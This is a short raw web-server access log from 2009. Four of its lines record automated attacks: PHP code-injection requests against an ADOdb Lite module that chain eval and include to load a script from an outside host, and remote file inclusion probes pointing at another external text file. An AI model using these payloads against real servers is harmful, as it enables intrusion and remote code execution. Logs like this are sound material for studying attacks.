200.43.77.59 - - [17/Apr/2009:14:19:34 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:14:19:34 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.120 - - [17/Apr/2009:14:20:03 -0500] "GET /logs/access_log.1159315200 HTTP/1.0" 200 657 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.64.230.12 - - [17/Apr/2009:14:30:36 -0500] "GET /logs//index.php?meio.php=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
208.64.230.12 - - [17/Apr/2009:14:30:36 -0500] "GET //index.php?meio.php=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
